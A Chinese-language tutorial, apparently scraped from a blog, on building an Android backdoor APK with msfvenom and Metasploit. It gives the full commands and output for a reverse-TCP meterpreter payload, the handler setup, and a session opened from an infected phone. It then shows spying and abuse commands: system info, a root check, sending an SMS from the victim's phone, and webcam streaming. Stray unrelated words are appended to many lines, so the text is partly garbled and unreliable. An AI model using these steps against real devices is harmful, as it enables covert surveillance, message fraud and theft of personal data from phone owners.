扫盲教程,大佬勿喷。html
实验中请更改成你环境的IP。java
生成apk后门
Kali Linux(Hack):192.168.169.76android
Android(靶机):192.168.169.137web
启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊浏览器
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 9486 bytes
lhost为kali的ip,lport指定一个端口。bash
开metasploit控制台侦听
root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.169.76 #kali的IP lhost => 192.168.169.76 msf exploit(handler) > set lport 445 #对应刚才设的端口 lport => 445 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.169.76:445 [*] Starting the payload handler... [*] Sending stage (63194 bytes) to 192.168.169.137 [*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
复制apk出来装到手机上打开后就能够exploit了,会看到会话反弹回来。微信
能够看下帮助都有啥操做session
meterpreter > helpapp
功能示例
读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,仍是挺强大的。tcp
#系统信息
meterpreter > sysinfo
Computer : localhost
OS : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android
#查看root状态
meterpreter > check_root
[+] Device is rooted
#发送短信
meterpreter > send_sms
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."
OPTIONS:
-d <opt> Destination number
-dr Wait for delivery report
-h Help Banner
-t <opt> SMS body text
meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
#网页视频聊天(我手机没合适浏览器没打开) meterpreter > webcam_chat [*] Webcam chat session initialized. [-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine #网页摄像头视频流,显示实时画面 meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: lwqAtUFm.html [*] Streaming...
补充freebuf上的文章: